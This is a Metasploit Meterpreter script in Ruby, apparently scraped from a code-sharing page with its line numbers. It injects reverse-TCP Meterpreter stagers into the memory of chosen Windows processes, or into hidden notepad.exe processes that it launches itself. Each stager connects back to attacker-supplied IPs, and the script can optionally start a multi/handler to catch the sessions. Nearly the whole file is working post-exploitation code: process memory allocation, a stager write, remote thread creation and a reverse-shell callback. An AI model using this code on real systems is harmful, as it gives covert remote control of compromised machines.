Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
3
# If you'd like to improve this script, please try to port it as a post
4
# module instead. Thank you.
5
##
6

7

8
# Author: Carlos Perez at carlos_perez[at]darkoperator.com
9
#-------------------------------------------------------------------------------
10
################## Variable Declarations ##################
11

12
@client = client
13
lhost    = Rex::Socket.source_address("1.2.3.4")
14
lport    = 4444
15
lhost    = "127.0.0.1"
16
pid = nil
17
multi_ip = nil
18
multi_pid = []
19
payload_type = "windows/meterpreter/reverse_tcp"
20
start_handler = nil
21
@exec_opts = Rex::Parser::Arguments.new(
22
  "-h"  => [ false,  "Help menu." ],
23
  "-p"  => [ true,   "The port on the remote host where Metasploit is listening (default: 4444)."],
24
  "-m"  => [ false,  "Start exploit/multi/handler for return connection."],
25
  "-P" => [ true,   "Specify reverse connection Meterpreter payload. Default: windows/meterpreter/reverse_tcp"],
26
  "-I" => [ true,   "Provide multiple IP addresses for connections separated by comma."],
27
  "-d" => [ true,   "Provide multiple PID for connections separated by comma one per IP."]
28
)
29
meter_type = client.platform
30

31
################## Function Declarations ##################
32

33
# Usage Message Function
34
#-------------------------------------------------------------------------------
35
def usage
36
  print_line "Meterpreter script for injecting a reverse tcp Meterpreter payload"
37
  print_line "in to memory of multiple PIDs. If none is provided, a notepad process"
38
  print_line "will be created and a Meterpreter payload will be injected in to each."
39
  print_line(@exec_opts.usage)
40
  raise Rex::Script::Completed
41
end
42

43
# Wrong Meterpreter Version Message Function
44
#-------------------------------------------------------------------------------
45
def wrong_meter_version(meter = meter_type)
46
  print_error("#{meter} version of Meterpreter is not supported with this script!")
47
  raise Rex::Script::Completed
48
end
49

50
# Function for injecting payload in to a given PID
51
#-------------------------------------------------------------------------------
52
def inject(target_pid, payload_to_inject)
53
  print_status("Injecting meterpreter into process ID #{target_pid}")
54
  begin
55
    host_process = @client.sys.process.open(target_pid.to_i, PROCESS_ALL_ACCESS)
56
    raw = payload_to_inject.generate
57
    mem = host_process.memory.allocate(raw.length + (raw.length % 1024))
58

59
    print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
60
    print_status("Writing the stager into memory...")
61
    host_process.memory.write(mem, raw)
62
    host_process.thread.create(mem, 0)
63
    print_good("Successfully injected Meterpreter in to process: #{target_pid}")
64
  rescue::Exception => e
65
    print_error("Failed to Inject payload to #{target_pid}!")
66
    print_error(e)
67
  end
68
end
69

70
# Function for creation of connection handler
71
#-------------------------------------------------------------------------------
72
def create_multi_handler(payload_to_inject)
73
  mul = @client.framework.exploits.create("multi/handler")
74
  mul.share_datastore(payload_to_inject.datastore)
75
  mul.datastore['WORKSPACE'] = @client.workspace
76
  mul.datastore['PAYLOAD'] = payload_to_inject
77
  mul.datastore['EXITFUNC'] = 'process'
78
  mul.datastore['ExitOnSession'] = true
79
  print_status("Running payload handler")
80
  mul.exploit_simple(
81
    'Payload'  => mul.datastore['PAYLOAD'],
82
    'RunAsJob' => true
83
  )
84

85
end
86

87
# Function for creating the payload
88
#-------------------------------------------------------------------------------
89
def create_payload(payload_type,lhost,lport)
90
  print_status("Creating a reverse meterpreter stager: LHOST=#{lhost} LPORT=#{lport}")
91
  payload = payload_type
92
  pay = client.framework.payloads.create(payload)
93
  pay.datastore['LHOST'] = lhost
94
  pay.datastore['LPORT'] = lport
95
  return pay
96
end
97

98
# Function starting notepad.exe process
99
#-------------------------------------------------------------------------------
100
def start_proc()
101
  print_good("Starting Notepad.exe to house Meterpreter session.")
102
  proc = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
103
  print_good("Process created with pid #{proc.pid}")
104
  return proc.pid
105
end
106
################## Main ##################
107
@exec_opts.parse(args) { |opt, idx, val|
108
  case opt
109
  when "-h"
110
    usage
111
  when "-p"
112
    lport = val.to_i
113
  when "-m"
114
    start_handler = true
115
  when "-P"
116
    payload_type = val
117
  when "-I"
118
    multi_ip = val.split(",")
119
  when "-d"
120
    multi_pid = val.split(",")
121
  end
122
}
123

124
# Check for version of Meterpreter
125
wrong_meter_version(meter_type) if meter_type != 'windows'
126
# Create a exploit/multi/handler if desired
127
create_multi_handler(payload_type) if start_handler
128

129
# Check to make sure a PID or program name where provided
130

131
if multi_ip
132
  if multi_pid
133
    if multi_ip.length == multi_pid.length
134
      pid_index = 0
135
      multi_ip.each do |i|
136
        payload = create_payload(payload_type,i,lport)
137
        inject(multi_pid[pid_index],payload)
138
        select(nil, nil, nil, 5)
139
        pid_index = pid_index + 1
140
      end
141
    else
142
      multi_ip.each do |i|
143
        payload = create_payload(payload_type,i,lport)
144
        inject(start_proc,payload)
145
        select(nil, nil, nil, 2)
146
      end
147
    end
148
  end
149
else
150
  print_error("You must provide at least one IP!")
151
end
152

153